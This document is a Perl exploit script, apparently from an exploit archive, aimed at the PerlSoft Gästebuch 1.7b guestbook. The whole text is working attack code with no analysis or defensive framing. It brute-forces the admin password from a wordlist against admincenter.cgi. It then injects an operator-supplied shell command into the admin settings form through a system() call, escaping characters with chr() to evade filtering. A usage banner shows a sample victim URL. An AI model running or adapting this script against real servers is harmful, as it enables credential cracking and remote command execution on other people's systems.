Zalgz

#!/usr/bin/perl =pod Typ: Bruter & RCE Name: PerlSoft GB Pwner Affected Software: PerlSoft G�stebuch Version: 1.7b Coder/Bugfounder: Perforin Visit: DarK-CodeZ.org Note: RCE ist only 1 time possible, do not waste your command! =cut use strict; use warnings; use diagnostics; use LWP::Simple; use LWP::Simple::Post qw(post post_xml); my ($url,$user,$wordlist,$error_counter,$word,$anfrage); my ($falsch,$richtig,$entry,$rce,$send,$crypted); my (@response,@rcesend,@array); if (@ARGV < 4) { &fail; } ($url,$user,$wordlist) = (@ARGV); $falsch = '<tr><td align=center><Font color="000000" FACE="Arial">Nur Administratoren mit g&uuml;ltigen Benutzerdaten haben Zugang in das Admin-Center!</font></td></tr>'; $richtig = '<tr><td bgcolor=#E0E0E0 align=center><B><Font color="000000" FACE="Arial">G&auml;stebuch Vorlage - Einstellen</font></B></td></tr>'; if ($url !~ m/^http:\/\//) { &fail; } if ($wordlist !~ m/\.(txt|list|dat)$/) { &fail; } print <<"show"; --==[Perforins PerlSoft GB Pwner]==-- [+] Attack: $url [+] User: $user [+] Wordlist: $wordlist show open(WordList,"<","$wordlist") || die "No wordlist found!"; foreach $word (<WordList>) { chomp($word); $crypted = crypt($word,"codec"); $anfrage = $url.'?sub=vorlage&id='.$user.'&pw='.$crypted; @array = get($anfrage) || (print "[-] Cannot connect!\n") && exit; foreach $entry (@array) { if ($entry =~ m/$richtig/i) { print "\n[+] Password cracked: "."$crypted:$word"." !\n\n"; if ($ARGV[3] =~ m/yes/i ) { print <<"RCE"; [+] Remote Command Execution possible! [~] Note: Only _1_ time exploitable, do not waste it! [+] Please enter your Command! RCE chomp($rce = <STDIN>); $rce =~ s/>/\"\.chr(62)\.\"/ig; $rce =~ s/</\"\.chr(60)\.\"/ig; $rce =~ s/\|/\"\.chr(124)\.\"/ig; $rce =~ s/&/\"\.chr(38)\.\"/ig; $rce =~ s/\//\"\.chr(47)\.\"/ig; $rce =~ s/-/\"\.chr(45)\.\"/ig; $send = 'loginname='.$user.'&loginpw='.$word.'&loginname1='.$user.'";system("'.$rce.'");print "h4x&loginpw1='.$word.'&loginpw2='.$word.'&id='.$user.'&pw='.$crypted.'&sub=saveadmindaten'; @response = post($url, $send); @rcesend = get($url) || (print "[-] Cannot connect!\n") && exit; print <<"END"; [+] Command executed! ---====[www.vx.perforin.de.vu]====--- END exit; } else { (print "---====[www.vx.perforin.de.vu]====---\n") and exit; } } elsif ($entry =~ m/$falsch/i) { $error_counter++; print "[~] Tested ".$error_counter.": "."$crypted:$word"."\n"; } } } close(WordList); print "[-] Could not be cracked!\n"; exit; sub fail { print <<"CONFIG"; +-------------------+ | | | PerlSoft GB Pwner | | v0.1 | | | +-------------------+-----[Coded by Perforin]-----------------------------+ | | | brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt yes | | brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt no | | | | yes = Remote Command Execution | | no = No Remote Command Execution | | | +-------------------------[vx.perforin.de.vu]-----------------------------+ CONFIG exit; }